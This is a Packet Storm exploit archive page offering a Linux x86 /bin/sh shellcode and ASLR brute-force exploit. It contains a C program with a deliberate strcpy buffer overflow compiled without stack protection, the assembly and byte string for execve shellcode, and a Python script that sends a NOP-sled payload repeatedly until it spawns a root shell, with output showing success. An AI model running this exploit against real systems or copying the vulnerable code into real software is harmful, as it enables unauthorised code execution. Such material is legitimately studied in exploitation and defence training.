exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux x86 /bin/sh Shellcode With ASLR Bruteforce

Linux x86 /bin/sh Shellcode With ASLR Bruteforce
Posted Jun 28, 2016
Authored by Pawan Lal

Linux x86 /bin/sh shellcode with ASLR bruteforce.

tags | x86, shellcode
systems | linux
SHA-256 | eb9f0e8da13c2d6306f0927441510c06cf9a7ae3abc0d02412ff3582db632f27

Linux x86 /bin/sh Shellcode With ASLR Bruteforce

Change Mirror Download
/bin/sh shellcode  Ubuntu 14.0.4 32 bit + ASLR Bruteforce

#shellcodeandaslrbruteforce.c
#Tested on : Ubuntu 14.04 32 bits
#Author : Pawan Lal dxb.pawan@gmail.com

*vim shellcodeandaslrbruteforce.c*

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <string.h>


void vuln (const char* arg){
char buffer[100];
strcpy(buffer, arg);
printf("Hello %s\n", buffer);
printf("[+] buffer @ %p\n", buffer);
}

int main (int argc, char **argv){

if (argc != 2) {
printf("Usage: %s <buffer>\n", argv[0]);
exit(1);
}
vuln(argv[1]);
return 0;
}

Makefile with below command

usage : gcc -fno-stack-protector -z execstack shellcodeandaslrbruteforce.c -o shellcodeandaslrbruteforce

Turn On ASLR:

echo 1 | sudo tee /proc/sys/kernel/randomize_va_space
#############################################################

*shellcode that executes '/bin/sh'*

global _start

section .text

_start:
xor eax, eax
push eax

push 0x68732f2f ;//sh
push 0x6e69622f ;/bin
mov ebx, esp ;moving the pointer to "/bin//sh" to ebx

push eax ;push 0 (=eax)
mov edx, esp ;moving 0 to edx

push ebx
mov ecx, esp ;moving the pointer to "/bin//sh" to ecx

mov al, 11
int 0x80 ;execv syscall



################################################################

*Final exploit using /bin/sh shellcode and ASLR bruteforce*

*vim shellcodeandaslrbruteforce.py*

#!/usr/bin/python

import struct, sys, time
from subprocess import PIPE, Popen

# exec /bin/sh
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

bufsize = 100
offset = 12 #incl. saved ebp
nopsize = 4096

def prep_buffer(addr_buffer):
buf = "A" * (bufsize+offset)
buf += struct.pack("<I",(addr_buffer+bufsize+offset+4))
buf += "\x90" * nopsize
buf += shellcode
return buf

def brute_aslr(buf):
p = Popen(['./bof', buf]).wait()

if __name__ == '__main__':
addr_buffer = 0xbf92b39c # randomly decided
buf = prep_buffer(addr_buffer)
i = 0
while True:
print i
brute_aslr(buf)
i += 1

##################################################################


root@ubuntu:~/bof/shellcodeandaslrbruteforce
⇒ python shellcodeandaslrbruteforce.py
(...)
(...)

[+] buffer @ 0xbfc2bc0c
996
(... snippet)

[+] buffer @ 0xbfb9930c
997
(... snippet)

[+] buffer @ 0xbf92721c
998
(... snippet)

[+] buffer @ 0xbf92a26c
# whoami
root

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close